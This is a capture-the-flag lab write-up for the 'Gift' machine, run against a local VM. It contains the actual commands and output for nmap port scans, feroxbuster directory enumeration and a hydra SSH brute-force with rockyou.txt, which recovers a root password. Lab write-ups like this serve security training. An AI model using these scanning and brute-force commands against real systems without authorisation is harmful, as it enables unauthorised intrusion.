This machine only provide SSH and Web services for us. The only interesting thing is that this web service reminds us not to overthink it - it's incredibly simple.

Besides the web service, the only thing left is SSH. Based on this hint, I plan to try some common credentials to brute-force this service. Fortunately, I successfully obtained the root user credential.

Summary

Scope

  • Name: Gift
  • Difficulty: Easy
  • OS: Linux
  • IP: Local VM

Learned

Sometime, things can be simple enough!

Enumeration

Nmap

Overall

nmap -sT --min-rate 5000 -oN overall [IP]

Nmap scan report for 192.168.1.36
Host is up (0.000042s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Detail

nmap -sC -sV -O -vv -p22,80 -oN detail [IP]

Nmap scan report for 192.168.1.36
Host is up (0.00049s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
|   3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
|   256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_  256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open  http    nginx
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Supported Methods: GET HEAD
MAC Address: 08:00:27:77:EF:80 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Uptime guess: 4.381 days (since Wed Feb 25 06:32:30 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros

UDPScan

nmap -sU --top-ports 32 -oN udpscan [IP]

Nmap scan report for 192.168.1.36
Host is up (0.00039s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    closed        dhcpc
69/udp    open|filtered tftp
111/udp   open|filtered rpcbind
123/udp   open|filtered ntp
135/udp   open|filtered msrpc
136/udp   open|filtered profile
137/udp   open|filtered netbios-ns
138/udp   closed        netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   closed        snmptrap
445/udp   open|filtered microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   open|filtered route
631/udp   open|filtered ipp
996/udp   open|filtered vsinet
997/udp   closed        maitrd
998/udp   open|filtered puparp
999/udp   closed        applix
1434/udp  closed        ms-sql-m
1701/udp  closed        L2TP
1812/udp  open|filtered radius
1900/udp  closed        upnp
3283/udp  closed        netassistant
4500/udp  closed        nat-t-ike
5353/udp  open|filtered zeroconf
49152/udp open|filtered unknown
49153/udp open|filtered unknown
49154/udp closed        unknown
MAC Address: 08:00:27:77:EF:80 (Oracle VirtualBox virtual NIC)

Web 

❰curtain❙~/workspace/shooting/hmvm/gift❱✔≻ curl http://192.168.1.36

Dont Overthink. Really, Its simple.
	<!-- Trust me -->

Here the web service hints us its really simple.

And we get nothing from web content enumeration.

❰curtain❙~/workspace/shooting/hmvm/gift❱✔≻ feroxbuster -u http://192.168.1.36/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x pdf,txt,php,zip,db,bak

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.1.36/
 🚩  In-Scope Url          │ 192.168.1.36
 🚀  Threads               │ 64
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /home/curtain/.config/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [pdf, txt, php, zip, db, bak]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        7l       11w      146c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        4l        9w       57c http://192.168.1.36/
[####################] - 73s  1543822/1543822 0s      found:1       errors:1
[####################] - 72s  1543822/1543822 21303/s http://192.168.1.36/                                                      ❰curtain❙~/workspace/shooting/hmvm/gift❱✔≻

Pwned

Cause we get nothing interesting except the really simple hints, the only thing we can do is finding vulnerabilities in the SSH service. Based on the hint, we can try some common user name like root/admin.

❰curtain❙~/workspace/shooting/hmvm/gift❱✔≻ hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.36 ssh -t 4
...
[DATA] attacking ssh://192.168.1.36:22/
[22][ssh] host: 192.168.1.36   login: root   password: simple
1 of 1 target successfully completed, 1 valid password found

Yeah! we get it with root user!